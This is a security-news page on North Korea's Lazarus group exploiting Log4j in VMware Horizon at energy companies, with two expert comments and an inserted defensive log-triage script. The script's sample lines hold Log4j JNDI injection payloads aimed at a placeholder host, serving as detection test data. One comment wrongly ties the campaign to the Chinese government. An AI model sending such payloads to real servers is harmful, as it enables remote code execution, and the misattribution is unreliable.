Lazarus APT Uses Log4j Flaw To Hack US, Canadian Energy Co’s – Cyber Experts Comment

Researchers have uncovered a new campaign targeting U.S., Canadian and Japanese energy providers, attributed to the North Korean Lazarus APT hacking group. The initial vector was exploitation of the Log4j vulnerability on exposed VMware Horizon servers, which was used to gain an initial foothold into the targeted organizations: https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html

Erich Kron, Security Awareness Advocate
InfoSec Expert
September 12, 2022 2:26 pm

This attack illustrates some of the serious issues with U.S. and global critical infrastructure and the need to step up our game in these areas. The Log4j exploit used in these attacks has been known, and called critical, for over a year. However, our adversaries are still able to find and exploit unpatched sites that are directly connected to the internet. In June of 2022, CISA issued an alert (AA22-174A) specifically addressing this threat. However, it seems there are still systems that have not been patched yet. This poses a huge threat to some of the most critical systems within the critical infrastructure space.

While it appears that the intrusions are currently seeking intellectual property that the Chinese government can use themselves or perhaps use to produce cheap copies of equipment, it would not take much to weaponize the access and potentially cripple many power and energy sites across the country. 

Organizations that still use software susceptible to Log4j vulnerabilities should immediately remove direct internet access from the devices until the vulnerabilities are mitigated.

Last edited 2 months ago by Erich Kron
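The comment above recommends cutting direct internet access to Log4j-exposed systems until they are patched; a defender also wants to know whether such systems were already probed. The following is an added example (not part of the article or either commenter's text) of a small log-triage script that flags Log4j lookup syntax in web-server request fields. The log lines are constructed for the example, the IP addresses are documentation ranges, and the combined-log regex and severity rules are the author's assumptions, not a vendor's detection logic.

```python
import re
from typing import Dict, List, Optional

# Constructed sample lines in combined-log format (not real traffic).
# Two carry a JNDI lookup (one wrapped in a nested lookup), one carries a
# non-JNDI lookup, and one is ordinary traffic.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [12/Sep/2022:14:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Sep/2022:14:01:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [12/Sep/2022:14:01:09 +0000] "GET /portal/?x=${${lower:j}ndi:rmi://198.51.100.7/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.23 - - [12/Sep/2022:14:02:00 +0000] "POST /api/login HTTP/1.1" 401 40 "${date:yyyy}" "Mozilla/5.0"',
]

# Combined log format: src ident user [ts] "METHOD URI PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Request fields an unauthenticated client controls and that commonly end up in Log4j log calls.
CLIENT_FIELDS = ("uri", "referer", "ua")


def collapse_lookups(text: str) -> str:
    """Strip lookup delimiters so nested ${...} wrappers no longer hide the inner protocol name."""
    return text.replace("${", "").replace("}", "").lower()


def classify_field(value: str) -> str:
    """'high' for a JNDI lookup, 'medium' for any other Log4j lookup syntax, 'none' otherwise.
    No legitimate browser or API client sends ${...} lookup syntax, so any hit is worth a look."""
    if "${" not in value:
        return "none"
    if "jndi:" in collapse_lookups(value):
        return "high"
    return "medium"


def triage_line(line: str) -> Optional[Dict]:
    """Return an alert dict for a suspicious line, or None for clean or unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hits = [(f, classify_field(m.group(f))) for f in CLIENT_FIELDS]
    hits = [(f, sev) for f, sev in hits if sev != "none"]
    if not hits:
        return None
    worst = "high" if any(sev == "high" for _, sev in hits) else "medium"
    return {
        "src": m.group("src"),
        "ts": m.group("ts"),
        "severity": worst,
        "fields": [f for f, _ in hits],
        "status": int(m.group("status")),
    }


def triage_log(lines: List[str]) -> List[Dict]:
    """Run triage over every line and keep only the alerts, in log order."""
    return [alert for alert in map(triage_line, lines) if alert is not None]


def sources_by_severity(alerts: List[Dict]) -> Dict[str, List[str]]:
    """Group distinct source addresses by the worst severity seen from each."""
    worst: Dict[str, str] = {}
    for a in alerts:
        if a["severity"] == "high" or a["src"] not in worst:
            worst[a["src"]] = a["severity"]
    out: Dict[str, List[str]] = {"high": [], "medium": []}
    for src, sev in worst.items():
        out[sev].append(src)
    return out


if __name__ == "__main__":
    for alert in triage_log(SAMPLE_LOG_LINES):
        print(alert)
    print(sources_by_severity(triage_log(SAMPLE_LOG_LINES)))
```

The severity split matters operationally: a `jndi:` hit against a host that is known to run a vulnerable Log4j version (the VMware Horizon case in the article) is an incident, not a scan, and the HTTP status alone does not tell you whether the lookup was evaluated, because Log4j processes the string when it is logged, not when the request is served.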
Chris Clements, VP
InfoSec Expert
September 12, 2022 2:25 pm

In every country, critical infrastructure entities such as energy companies are specifically and regularly targeted by nation-state backed hacking groups. Many of these groups can have significant capabilities and resources. The targeted nature of their campaigns also means they can take target-specific approaches by analyzing the individual behaviors and operations at their objective organization. Most general cybercrime is opportunistic in nature, using simple and cheap means such as mass phishing campaigns and automated password guessing bots to cast a wide net to potential victims. That the non-targeted approach is so regularly successful should give us pause when assessing the risk of a hyper-targeted attack from highly skilled adversaries with both ample budget and a specific mission.

The good news, if there is any, is that it’s still possible to mitigate risk by investing in the fundamentals of cybersecurity, beginning with a strong cultural approach. The essential elements of protection through segmentation, attack surface reduction, and system hardening make it more difficult for threat actors to operate and spread if they get a foothold. Careful monitoring controls that include threat hunting and rapid alerting of suspicious behavior to an experienced team can help quickly identify and neutralize attackers that manage to bypass prevention controls. Regular security validations such as penetration testing can help identify vulnerabilities from omissions or misconfigurations before attackers can exploit them in the first place. The problem is that it’s easy enough to say and understand the factors that contribute to cybersecurity resiliency, but implementation is challenging, especially in organizations with competing priorities and limited resources. To be successful, leaders must own the reality of cybersecurity threats and dedicate both the human and monetary resources to protecting their organizations.

Last edited 2 months ago by Chris Clements